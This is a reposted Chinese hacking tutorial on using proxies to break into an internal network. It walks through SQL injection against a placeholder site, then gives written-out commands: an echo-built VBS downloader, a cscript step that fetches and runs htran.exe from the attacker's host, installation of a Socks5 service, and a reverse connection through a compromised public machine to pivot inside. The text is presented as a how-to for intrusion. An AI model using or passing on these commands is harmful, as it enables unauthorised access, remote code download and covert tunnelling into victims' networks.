妙用代理渗透内网

简介: 文章作者:LiNzi [BCT&混客联盟](chinaskyv@163.com) 信息来源:邪恶八进制信息安全团队 正文 代理在入侵里的作用-----妙用代理,渗透内网 一、踩点 主机: http://www.
文章作者:LiNzi [BCT&混客联盟](chinaskyv@163.com
信息来源:邪恶八进制信息安全团队

正文
代理在入侵里的作用-----妙用代理,渗透内网
一、踩点
主机: http://www.baidu.com/
OS:Windows 2000 + IIS 5.0 + MSSQL
端口:80 21
数据库放内网,IP为 192.168.1.2 ,更重要的是内网数据库可以上网.
首页存在注入漏洞,sa登陆.
注入点:
http://www.baidu.com/list.asp?id=1
二、入侵思路
  1.给内网目标机装个代理服务器
  2.把弄好的那个代理端口映到公网.
  3.本机用sockscap连接公网映的那个端口,这样,自己也就进到了内网。
  4.接下来就是找共享,嗅探,社会工程学等等了。
三、入侵准备
  1.公网肉鸡一只:218.3.1.1
  2.工具:htran2.4,SocksCap,扫描器一份,NBSI 2.0一份。
  3.A表示数据库主机,B表示公网肉鸡 C表示网站放Web的地方 D表示本机(也在内网)
  4.A:192.168.1.2   B:218.3.1.1 C:www.baidu.com D:192.168.0.25
四、入侵进行时
  1.工具上传:
在nbsi下执行:
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(Wscript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(Wscript.Arguments(1)),2 >down.vbs
然后下载工具:
cscript down.vbs http://IP/htran.exe htran.exe //到我的空间下载htran.exe
  2.安装Socks5服务
在nbsi下执行:
htran.exe -install   //安装Socks5服务
htran.exe -start   //启动Socks5服务
  3.反弹进行时
在B上运行:   htran.exe -s -listen 520 5200   //监听端口
在nbsi下执行:htran.exe -s -connect 218.3.1.1 520
  3.进入内网
现在用SocksCap连接 218.3.1.1 的5200端口,就等于进入了他的内网。
五、渗透内网
  接下来就可以扫描,嗅探,等等,也就是后话了。
六、总结
  文章技术性不高,有错的地方希望高手指出,偶是菜鸟,也希望这篇文章对大家有所帮助。

偶的朋友可以在我的QQ硬盘里面下载动画。在我的个人文章里面。

目录
相关文章
|
4天前
|
算法 安全 定位技术
Tiktok养号为什么要用静态IP代理?有什么优势?
TikTok作为当今最受欢迎的社交媒体应用之一,吸引了无数的用户和创作者,然而,对于一些用户来说,维护和发展自己的TikTok账号可能并不容易。 为了克服TikTok账号养成过程中的一些挑战,一些用户会使用静态IP代理来养号。 在本文中,我们将探讨为什么使用静态IP代理在TikTok养号中更为优越。 什么是静态IP代理? 首先,让我们先了解什么是静态IP代理,静态IP代理是一种将互联网流量通过一个静态IP地址转发到另一个IP地址的技术。 静态IP代理可以为tiktok养号带来哪些帮助?
|
8天前
|
监控 安全 网络安全
代理IP安全问题:在国外使用代理IP是否安全
代理IP安全问题:在国外使用代理IP是否安全
|
8天前
|
数据采集
如何解决无法联网的IP代理问题
如何解决无法联网的IP代理问题
|
9天前
|
存储
易语言代理IP设置
易语言代理IP设置
|
9天前
|
安全 网络安全 定位技术
为何要隐藏IP地址?代理ip在网络安全和隐私保护中的作用是什么?
为何要隐藏IP地址?代理ip在网络安全和隐私保护中的作用是什么?
|
9天前
|
监控 安全 网络安全
IP地址与代理ip在网络安全中的关键作用
IP地址与代理ip在网络安全中的关键作用
公开免费的代理ip有哪些不足的地方?
公开免费的代理ip有哪些不足的地方?
|
11月前
|
SQL 安全 Shell
内网代理技术
在我们的内网渗透中,我们往往是通过拿下Web服务器的权限,再通过Web服务器做一个跳板来做横向渗透。我们知道在我们拿下的Web的服务器上做一些横向渗透是有点困难的,因为在Web这台机器上没有我们平常渗透常用的一些渗透工具,故横向渗透非常的困难,假如我们可以直接用我们自己的电脑做攻击机就可以让我们在渗透的过程中得心应手。但是我们知道我们想要拿到的服务器在内网之中,我们无法通过互联网去直接访问它,这种时候我们又想控制它,我们就需要借助一些代理技术来辅助我们去完成直接控制内网机器的过程。
127 0
|
缓存 网络协议 安全
DNS攻击和DNS污染是什么意思?底层原理是什么?
DNS攻击和DNS污染是什么意思?底层原理是什么?
497 0
隧道代理阿布云、亿牛云、熊猫代理好用吗?自己要怎么做一个隧道代理?
众所周知,隧道代理比动态短效代理贵,但是因为其产品特性,确实也更好用更方便,那我们要如何自己搭建起来隧道代理呢?